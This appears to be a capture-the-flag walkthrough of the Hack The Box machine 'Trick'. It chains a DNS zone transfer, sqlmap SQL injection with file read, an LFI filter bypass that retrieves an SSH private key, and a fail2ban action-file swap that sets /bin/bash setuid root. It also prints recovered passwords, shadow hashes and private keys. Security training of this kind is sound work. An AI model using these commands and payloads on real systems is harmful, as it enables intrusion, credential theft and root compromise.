Basic information
Port scan: 22, 25, 53 and 80 are open:
```console
$ nmap -sC -sV 10.10.11.166
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-29 13:21 CST
Nmap scan report for 10.10.11.166
Host is up (0.20s latency).
Not shown: 996 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 61:ff:29:3b:36:bd:9d:ac:fb:de:1f:56:88:4c:ae:2d (RSA)
|   256 9e:cd:f2:40:61:96:ea:21:a6:ce:26:02:af:75:9a:78 (ECDSA)
|_  256 72:93:f9:11:58:de:34:ad:12:b5:4b:4a:73:64:b9:70 (ED25519)
25/tcp open  smtp    Postfix smtpd
|_smtp-commands: debian.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING
53/tcp open  domain  ISC BIND 9.11.5-P4-5.1+deb10u7 (Debian Linux)
| dns-nsid: 
|_  bind.version: 9.11.5-P4-5.1+deb10u7-Debian
80/tcp open  http    nginx 1.14.2
|_http-title: Coming Soon - Start Bootstrap Theme
|_http-server-header: nginx/1.14.2
Service Info: Host:  debian.localdomain; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 96.12 seconds
```
Port 80 served directly is just a "Coming Soon" page.
Port 53, DNS zone transfer: the server allows AXFR for trick.htb, which hands over a few names:
```console
$ dig @10.10.11.166 axfr trick.htb

; <<>> DiG 9.10.6 <<>> @10.10.11.166 axfr trick.htb
; (1 server found)
;; global options: +cmd
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.		604800	IN	NS	trick.htb.
trick.htb.		604800	IN	A	127.0.0.1
trick.htb.		604800	IN	AAAA	::1
preprod-payroll.trick.htb. 604800 IN	CNAME	trick.htb.
trick.htb.		604800	IN	SOA	trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 688 msec
;; SERVER: 10.10.11.166#53(10.10.11.166)
;; WHEN: Wed Jun 29 13:29:18 CST 2022
;; XFR size: 6 records (messages 1, bytes 203)
```
preprod-payroll.trick.htb
Add the names to /etc/hosts and browse to the vhost:
```text
10.10.11.166 preprod-payroll.trick.htb trick.htb
```
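Turning a zone transfer into a hosts entry is done by hand above. As an added example (not part of the original writeup), here is a small parser for dig's AXFR output that collects every owner name carrying an A, AAAA or CNAME record, plus CNAME targets, and emits the hosts line for the target IP. The sample input is the record section of the dig output above, embedded as a constant; nothing here contacts a DNS server.

```python
# Constructed sample: the record section of `dig @10.10.11.166 axfr trick.htb`
# from the writeup, including one trailing dig comment line.
DIG_AXFR_OUTPUT = """\
trick.htb.              604800  IN  SOA   trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
trick.htb.              604800  IN  NS    trick.htb.
trick.htb.              604800  IN  A     127.0.0.1
trick.htb.              604800  IN  AAAA  ::1
preprod-payroll.trick.htb. 604800 IN CNAME trick.htb.
trick.htb.              604800  IN  SOA   trick.htb. root.trick.htb. 5 604800 86400 2419200 604800
;; Query time: 688 msec
"""

# Record types whose owner name is a host we may want to reach over HTTP.
HOST_TYPES = {"A", "AAAA", "CNAME"}


def parse_axfr(text):
    """Return (owner, type, rdata) tuples from dig AXFR output.

    dig prints one record per line as: owner TTL class type rdata...
    Lines starting with ';' are dig's own commentary and are skipped.
    The SOA appears twice (start and end of the transfer); both are kept
    so the caller can see the raw record count, as dig reports it.
    """
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        fields = line.split()
        if len(fields) < 5 or fields[2] != "IN":
            continue  # not a record line we understand
        owner = fields[0].rstrip(".")
        rtype = fields[3]
        rdata = " ".join(fields[4:])
        records.append((owner, rtype, rdata))
    return records


def hostnames_from_axfr(text):
    """Unique host names worth an /etc/hosts entry, in first-seen order."""
    names = []
    for owner, rtype, rdata in parse_axfr(text):
        if rtype not in HOST_TYPES:
            continue
        if owner not in names:
            names.append(owner)
        # A CNAME target may live outside the dumped zone; keep it too.
        if rtype == "CNAME":
            target = rdata.rstrip(".")
            if target not in names:
                names.append(target)
    return names


def hosts_line(ip, names):
    """One /etc/hosts line mapping every discovered name to the box's IP."""
    return f"{ip} {' '.join(names)}"


if __name__ == "__main__":
    print(hosts_line("10.10.11.166", hostnames_from_axfr(DIG_AXFR_OUTPUT)))
```

Note that the A record in the zone points at 127.0.0.1, so the IP written to hosts has to be the scanned address, not whatever the zone says; that is why `hosts_line` takes the IP as an argument instead of reading it from the records.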
The preprod-payroll login is an obvious SQL injection.
SQL injection: straight to sqlmap against the login endpoint (POST to ajax.php?action=login). It dumps the users table, but the recovered password does not get us a login anywhere:
```console
sqlmap -u "http://preprod-payroll.trick.htb/ajax.php?action=login" --data "username=admin&password=aaa" -v 3 --level 3

available databases [2]:
[*] information_schema
[*] payroll_db

Database: payroll_db
[11 tables]
+---------------------+
| position            |
| allowances          |
| attendance          |
| deductions          |
| department          |
| employee            |
| employee_allowances |
| employee_deductions |
| payroll             |
| payroll_items       |
| users               |
+---------------------+

Table: users
[1 entry]
+----+-----------+---------------+------+---------+---------+-----------------------+------------+
| id | doctor_id | name          | type | address | contact | password              | username   |
+----+-----------+---------------+------+---------+---------+-----------------------+------------+
| 1  | 0         | Administrator | 1    | <blank> | <blank> | SuperGucciRainbowCake | Enemigosss |
+----+-----------+---------------+------+---------+---------+-----------------------+------------+
```
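The writeup does not show the payroll app's query, so the following is an added illustration, not the application's code: a login routine that concatenates the username and password into SQL (the shape sqlmap's findings imply), next to the same query with bound parameters. It runs against an in-memory SQLite table with a constructed row, not the real payroll_db, and shows both the authentication bypass and the UNION read that is essentially what sqlmap automated above. The password column is kept in clear text on purpose, because that is what the dump shows the application stores.

```python
import sqlite3


def make_db():
    """In-memory stand-in for payroll_db.users with one constructed row (not the real data)."""
    con = sqlite3.connect(":memory:")
    con.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT, type INTEGER)"
    )
    con.execute(
        "INSERT INTO users (username, password, type) VALUES ('admin', 'example-password', 1)"
    )
    return con


def login_vulnerable(con, username, password):
    """Assumed shape of the vulnerable login: user input spliced straight into the statement.

    Anything the attacker types becomes SQL syntax, so a quote ends the string literal
    and '--' comments out the password check.
    """
    sql = (
        f"SELECT id, username FROM users WHERE username = '{username}' "
        f"AND password = '{password}'"
    )
    return con.execute(sql).fetchone()


def login_hardened(con, username, password):
    """Same query with bound parameters: the driver sends values separately from the
    statement text, so input can never change the statement's structure. (A real fix
    also stops storing passwords in clear text; that is out of scope for this snippet.)"""
    sql = "SELECT id, username FROM users WHERE username = ? AND password = ?"
    return con.execute(sql, (username, password)).fetchone()


# Constructed payloads. Bypass: close the literal, make the WHERE always true, comment out the rest.
BYPASS_USERNAME = "' OR 1=1 -- "
# Data extraction: an empty first SELECT, then UNION in a column we control to read another row.
UNION_USERNAME = "' UNION SELECT id, password FROM users -- "


def leak_password_via_union(con):
    """What sqlmap does under the hood for a UNION-based dump: the 'username' slot of
    the result row now carries the password column."""
    row = login_vulnerable(con, UNION_USERNAME, "x")
    return row[1] if row else None


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, bypass :", login_vulnerable(db, BYPASS_USERNAME, "x"))
    print("vulnerable, union  :", leak_password_via_union(db))
    print("hardened, bypass   :", login_hardened(db, BYPASS_USERNAME, "x"))
    print("hardened, real cred:", login_hardened(db, "admin", "example-password"))
```

SQLite does not have MySQL's `LOAD_FILE()`, so the file read shown in the next section has no equivalent here; the structural lesson is the same, though: once the attacker controls statement syntax, every privilege the database account holds (FILE included) is theirs.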
File read: further testing shows the injection can read files from disk (sqlmap's --file-read, which relies on MySQL's LOAD_FILE(), so the database account holds the FILE privilege):
```console
sqlmap -u "http://preprod-payroll.trick.htb/ajax.php?action=login" --data "username=admin&password=aaa" -v 3 --level 3 --file-read "/etc/passwd"

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
tss:x:105:111:TPM2 software stack,,,:/var/lib/tpm:/bin/false
dnsmasq:x:106:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:108:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:109:118:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:112:121::/var/lib/saned:/usr/sbin/nologin
colord:x:113:122:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
geoclue:x:114:123::/var/lib/geoclue:/usr/sbin/nologin
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
Debian-gdm:x:116:124:Gnome Display Manager:/var/lib/gdm3:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
mysql:x:117:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:118:65534::/run/sshd:/usr/sbin/nologin
postfix:x:119:126::/var/spool/postfix:/usr/sbin/nologin
bind:x:120:128::/var/cache/bind:/usr/sbin/nologin
michael:x:1001:1001::/home/michael:/bin/bash
```
vhost: the one subdomain we have follows a preprod-<name> pattern, so prefix a standard subdomain list with preprod- and brute-force further vhosts:
```console
sed 's/^/preprod-/' ~/Tools/dict/SecLists/Discovery/DNS/subdomains-top1million-5000.txt > subdomains.txt
gobuster vhost -u http://trick.htb -w subdomains.txt -t 50

Found: preprod-marketing.trick.htb (Status: 200) [Size: 9660]
```
preprod-marketing: add it to hosts and browse to it.
LFI: the page parameter is an obvious local file inclusion candidate. There is a simple traversal filter, but it is not applied recursively, so doubling the sequence (..././, which collapses back to ../ after one strip) gets past it:
(The exact filter can also be confirmed by reading the vhost's source with the SQL file read from the previous step.)
```text
preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././..././..././etc/passwd
```
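The marketing vhost's actual source is not reproduced in the writeup, so this added example models the filter the doubled payload implies rather than quoting the app: a single-pass removal of "../" (what PHP's str_replace does), shown next to what the same include path resolves to, and next to a hardened resolver that allow-lists the page name and confirms the final path stays under the pages directory. PAGES_DIR and the ".php" suffix are assumptions for illustration; the real paths are not on the page.

```python
import os
import re

# Assumed web root for the marketing vhost's includes; not taken from the writeup.
PAGES_DIR = "/var/www/market/pages"

# The payload from the writeup: seven doubled traversals, then the target file.
PAYLOAD = "..././" * 7 + "etc/passwd"


def weak_filter(page):
    """Assumed filter: strip '../' in one non-recursive pass (PHP str_replace style).

    '..././' loses its inner '../' and what is left is '../' again, so the
    traversal survives. Plain '../' is removed, which is why naive payloads fail.
    """
    return page.replace("../", "")


def resolve_weak(page):
    """Path the vulnerable include ends up opening after the weak filter."""
    return os.path.normpath(os.path.join(PAGES_DIR, weak_filter(page)))


def strict_filter(page):
    """Recursive variant: keep stripping until nothing changes. Shown only to contrast
    with the single pass; on its own it is still the wrong fix (encodings, absolute
    paths, and anything else a blocklist forgets)."""
    while "../" in page:
        page = page.replace("../", "")
    return page


def resolve_hardened(page):
    """Allow-list the page name, build the path, then verify containment.

    Returns the path to include, or None if the request must be rejected.
    Containment is checked with commonpath after normalisation, so the check
    does not depend on string tricks in the input.
    """
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", page):
        return None
    full = os.path.normpath(os.path.join(PAGES_DIR, page + ".php"))  # assumed suffix
    if os.path.commonpath([PAGES_DIR, full]) != PAGES_DIR:
        return None
    return full


if __name__ == "__main__":
    print("weak filter sees   :", weak_filter(PAYLOAD))
    print("weak include opens :", resolve_weak(PAYLOAD))
    print("plain ../ payload  :", resolve_weak("../../etc/passwd"))
    print("hardened, payload  :", resolve_hardened(PAYLOAD))
    print("hardened, 'home'   :", resolve_hardened("home"))
```

The plain-traversal case is included because it is the observation that leads to the bypass: `../../etc/passwd` lands harmlessly inside PAGES_DIR, while the doubled form resolves to /etc/passwd. The hardened resolver never tries to "clean" the input; it rejects anything that is not a bare page name and double-checks the resolved path, which is the pattern to look for when reading the real source via the SQL file read.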
michael's id_rsa: the web process has permission to read michael's private key (the MySQL file read earlier did not):
```console
curl "http://preprod-marketing.trick.htb/index.php?page=..././..././..././..././..././..././..././home/michael/.ssh/id_rsa" > michael_id_rsa
```
Contents:
```text
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAwI9YLFRKT6JFTSqPt2/+7mgg5HpSwzHZwu95Nqh1Gu4+9P+ohLtz
c4jtky6wYGzlxKHg/Q5ehozs9TgNWPVKh+j92WdCNPvdzaQqYKxw4Fwd3K7F4JsnZaJk2G
YQ2re/gTrNElMAqURSCVydx/UvGCNT9dwQ4zna4sxIZF4HpwRt1T74wioqIX3EAYCCZcf+
4gAYBhUQTYeJlYpDVfbbRH2yD73x7NcICp5iIYrdS455nARJtPHYkO9eobmyamyNDgAia/
Ukn75SroKGUMdiJHnd+m1jW5mGotQRxkATWMY5qFOiKglnws/jgdxpDV9K3iDTPWXFwtK4
1kC+t4a8sQAAA8hzFJk2cxSZNgAAAAdzc2gtcnNhAAABAQDAj1gsVEpPokVNKo+3b/7uaC
DkelLDMdnC73k2qHUa7j70/6iEu3NziO2TLrBgbOXEoeD9Dl6GjOz1OA1Y9UqH6P3ZZ0I0
+93NpCpgrHDgXB3crsXgmydlomTYZhDat7+BOs0SUwCpRFIJXJ3H9S8YI1P13BDjOdrizE
hkXgenBG3VPvjCKiohfcQBgIJlx/7iABgGFRBNh4mVikNV9ttEfbIPvfHs1wgKnmIhit1L
jnmcBEm08diQ716hubJqbI0OACJr9SSfvlKugoZQx2Iked36bWNbmYai1BHGQBNYxjmoU6
IqCWfCz+OB3GkNX0reINM9ZcXC0rjWQL63hryxAAAAAwEAAQAAAQASAVVNT9Ri/dldDc3C
aUZ9JF9u/cEfX1ntUFcVNUs96WkZn44yWxTAiN0uFf+IBKa3bCuNffp4ulSt2T/mQYlmi/
KwkWcvbR2gTOlpgLZNRE/GgtEd32QfrL+hPGn3CZdujgD+5aP6L9k75t0aBWMR7ru7EYjC
tnYxHsjmGaS9iRLpo79lwmIDHpu2fSdVpphAmsaYtVFPSwf01VlEZvIEWAEY6qv7r455Ge
U+38O714987fRe4+jcfSpCTFB0fQkNArHCKiHRjYFCWVCBWuYkVlGYXLVlUcYVezS+ouM0
fHbE5GMyJf6+/8P06MbAdZ1+5nWRmdtLOFKF1rpHh43BAAAAgQDJ6xWCdmx5DGsHmkhG1V
PH+7+Oono2E7cgBv7GIqpdxRsozETjqzDlMYGnhk9oCG8v8oiXUVlM0e4jUOmnqaCvdDTS
3AZ4FVonhCl5DFVPEz4UdlKgHS0LZoJuz4yq2YEt5DcSixuS+Nr3aFUTl3SxOxD7T4tKXA
fvjlQQh81veQAAAIEA6UE9xt6D4YXwFmjKo+5KQpasJquMVrLcxKyAlNpLNxYN8LzGS0sT
AuNHUSgX/tcNxg1yYHeHTu868/LUTe8l3Sb268YaOnxEbmkPQbBscDerqEAPOvwHD9rrgn
In16n3kMFSFaU2bCkzaLGQ+hoD5QJXeVMt6a/5ztUWQZCJXkcAAACBANNWO6MfEDxYr9DP
JkCbANS5fRVNVi0Lx+BSFyEKs2ThJqvlhnxBs43QxBX0j4BkqFUfuJ/YzySvfVNPtSb0XN
jsj51hLkyTIOBEVxNjDcPWOj5470u21X8qx2F3M4+YGGH+mka7P+VVfvJDZa67XNHzrxi+
IJhaN0D5bVMdjjFHAAAADW1pY2hhZWxAdHJpY2sBAgMEBQ==
-----END OPENSSH PRIVATE KEY-----
```
User flag: log in as michael over SSH with the recovered private key.
Privilege escalation: the hint could not be clearer, fail2ban (michael is allowed to restart it with sudo).
When a ban fires, fail2ban runs the action command defined in its configuration, and it runs it as root. So the plan is: put our own command into the action config, restart the service so it reloads that config, then trigger a ban so fail2ban executes the command for us.
Looking at the config directory confirms it: the current user cannot modify the existing config files, but is in the security group, and that group has write permission on the directory itself. Write on the directory is enough to delete the original file and create a new one under the same name:
fail2ban to root: swap in the modified action file, restart the service, then trigger a ban so fail2ban runs the command:
```console
michael@trick:/tmp$ sed "s/<iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>/chmod u+s \/bin\/bash/g" /etc/fail2ban/action.d/iptables-multiport.conf > config.conf
michael@trick:/tmp$ rm -f /etc/fail2ban/action.d/iptables-multiport.conf
michael@trick:/tmp$ mv config.conf /etc/fail2ban/action.d/iptables-multiport.conf
michael@trick:/tmp$ sudo /etc/init.d/fail2ban restart

# From the attacking box: brute-force SSH to trigger the ban (the sed only rewrote
# actionban; actionunban uses -D and is untouched)
hydra 10.10.11.166 ssh -l root -P /usr/share/wordlists/rockyou.txt

# Once the ban has fired, /bin/bash is setuid root; run it with -p to keep the effective uid
michael@trick:/tmp$ /bin/bash -p
```
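The root cause here is a directory permission, not a fail2ban bug: a non-root group may write to /etc/fail2ban/action.d, and a user in that group may restart the service via sudo. As an added example (not from the writeup), the Python audit below walks a fail2ban configuration tree and reports every file or directory that group or world can write to, treating a writable directory as just as serious as a writable file, for exactly the unlink-and-recreate reason used above. `demo()` builds a throwaway tree in a temp directory that mirrors the misconfiguration (action.d at mode 0775); the real /etc/fail2ban path and the group name are not touched and the tree layout is constructed for illustration.

```python
import os
import stat
import tempfile


def writable_by_others(path):
    """Return why PATH is alterable by non-owners ('world-writable' or 'group-writable'),
    or None. Symlinks are skipped: their own mode bits are meaningless."""
    mode = os.lstat(path).st_mode
    if stat.S_ISLNK(mode):
        return None
    if mode & stat.S_IWOTH:
        return "world-writable"
    if mode & stat.S_IWGRP:
        return "group-writable"
    return None


def audit_tree(root):
    """Walk a fail2ban config tree and list every entry a non-root user could change.

    Each directory is checked as well as its files: write on action.d lets an attacker
    delete iptables-multiport.conf and drop a replacement, regardless of the file's own
    0644 mode, and the replacement's actionban then runs as root on the next ban.
    Returns sorted (relative_path, reason) pairs; an empty list means nothing was found.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        candidates = [dirpath] + [os.path.join(dirpath, f) for f in filenames]
        for path in candidates:
            reason = writable_by_others(path)
            if reason:
                findings.append((os.path.relpath(path, root), reason))
    return sorted(findings)


def demo():
    """Constructed tree mirroring the box: files are 0644, but action.d is group-writable."""
    root = tempfile.mkdtemp(prefix="fail2ban-audit-")
    action_d = os.path.join(root, "action.d")
    os.mkdir(action_d)
    conf = os.path.join(action_d, "iptables-multiport.conf")
    with open(conf, "w") as fh:
        fh.write("[Definition]\n"
                 "actionban = <iptables> -I f2b-<name> 1 -s <ip> -j <blocktype>\n")
    os.chmod(root, 0o755)
    os.chmod(action_d, 0o775)   # the misconfiguration: the directory's group can write
    os.chmod(conf, 0o644)       # the file itself looks fine, which is the trap
    return audit_tree(root)


if __name__ == "__main__":
    for rel, reason in demo():
        print(f"{reason:15s} {rel}")
```

Run for real as `audit_tree("/etc/fail2ban")` and pair the output with `sudo -l`: a writable action or jail file plus permission to restart or reload the service is a complete root path, since fail2ban interpolates its tags and hands the result to a shell as root. Note that `os.walk` does not follow symlinked directories by default, so a symlink pointing out of the tree is reported neither as writable nor descended into; adding `followlinks=True` changes that if the tree is known to use them.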
shadow
```text
root:$6$lbBzS2rUUVRa6Erd$u2u317eVZBZgdCrT2HViYv.69vxazyKjAuVETHTpTpD42H0RDPQIbsCHwPdKqBQphI/FOmpEt3lgD9QBsu6nU1:19104:0:99999:7:::
michael:$6$SPev7eFL5z0aKFf0$5iLTl9egsGGePEPUnNJlFyw8HHvTwqVC3/THKzW2YD5ZPnbkN7pSOeOkXe9uiUHfOJegJdYT0j3Z9pz.FSX2y0:19104:0:99999:7:::
```
root_id_rsa
```text
-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEAoSBXc6x1gauygp8zl8Y13QXTwj633MsMv/0YsBzmGiHb1xBadkGC
6a0abDxM4UycoYN82sT7N732cJqL9mWK7ZeGPQX4+RHD0fQnVQY3KCYak7RxQQtilsErhG
VgovwAtnbaKA+tlfsO7IlD3Mv6lbJ/ElD9drwhJOVdEf4IL+8SstVgd0AehVQgnLXd58MK
7tuKX+a/+eBBjzfpA6hWIzTT3koLnMoTWe5uCuhIJiaBUQyvrBQ1C/M4E7rnHw6Rgh9x9d
1LPInu0NMxbw0LAuFaQRcz3ewzEt8M2d639vedwahK5MyuTQS/ZTt33yjoas40kv+NZ5Y0
5vVeP6XxcwAAA8jXOo441zqOOAAAAAdzc2gtcnNhAAABAQChIFdzrHWBq7KCnzOXxjXdBd
PCPrfcywy//RiwHOYaIdvXEFp2QYLprRpsPEzhTJyhg3zaxPs3vfZwmov2ZYrtl4Y9Bfj5
EcPR9CdVBjcoJhqTtHFBC2KWwSuEZWCi/AC2dtooD62V+w7siUPcy/qVsn8SUP12vCEk5V
0R/ggv7xKy1WB3QB6FVCCctd3nwwru24pf5r/54EGPN+kDqFYjNNPeSgucyhNZ7m4K6Egm
JoFRDK+sFDUL8zgTuucfDpGCH3H13Us8ie7Q0zFvDQsC4VpBFzPd7DMS3wzZ3rf2953BqE
rkzK5NBL9lO3ffKOhqzjSS/41nljTm9V4/pfFzAAAAAwEAAQAAAQEAkxF9ITUZ8GjywC1m
HzOpOHu4JIWwtxSTJ65x2VYXZWTgT7Y6i9QSFQ6OnpqPpdmS4g2tadYAY4m9plw6QoW+wE
zdF1gbP+RKM5pCSGYq9DeLbKR392HX9DiPawJJqZqRX/qt94EP9WS544cK7T82E2tgdyx7
nePr8Mx2HhUcDfsbxQlRbM9oKqIBQ0v9GdBotvi+Ri/IQfpEpmS64cU450/DlrwQ358MU9
i8so0KlnAHLYxgzhEzPjPehaRShcsRdhasw1/xVKk7PoBvXzz9r+Ywo5b2htiYzqxt5N5i
E8UOrUeYb7G21QjuhKB9KerukyGeHdBPjqvYuYjTwf2dUQAAAIEAnSUxZdekVLY0IoYPBF
DBDIMkk97Kq2v8H51L9Q0rKBs79x4ZaV56LfMnTxuAxwnUMUauyPeGZFDgVsFwg0JK+vbR
Kj9idBoMTOuDdfTE4IJtT3tEKClzFS9YSrYdQ78OUu8Kip3p5OuWfrzTuhRCKZ2cwd86WU
ghEBWtHhn/2RsAAACBANHocGFZWWM1DGtA3ZXiytuJLh7D55NUPk7jumm+qcF7UUiKaRHA
QnQ44oxHssJbkGi4S3tvfSlXFtNboQCt3q5Wgc3wl4S+sBGoq1xsZuXAz/3QX2AjXSpN/S
PkO+h4pk25aAFjGmAMMoH1Ty9v2X8ahYRY5EV8Y/LRcMF32Z5rAAAAgQDEgb1hc85TS0Wz
pmGTto+ok3eI/10wxgbZXtdki7Jn1npNI5S7lh0r76jqEn5edcIYlwcUV+b6dCucDUhUHl
7VT/uoy+BKbanLzM809KCnuLCM7LDISk4N/S79xiuFlrk11MrV2qaxZANiYEkOd1jKRGPi
UDRYRn2lPX7WiLyrGQAAAApyb290QHRyaWNrAQIDBAUGBw==
-----END OPENSSH PRIVATE KEY-----
```
Last updated: 2022-10-31 09:01:32
Not good enough and getting beaten every day; can't do this, still have to learn that. Too slow, always at the bottom; can't understand this, can't pick up that.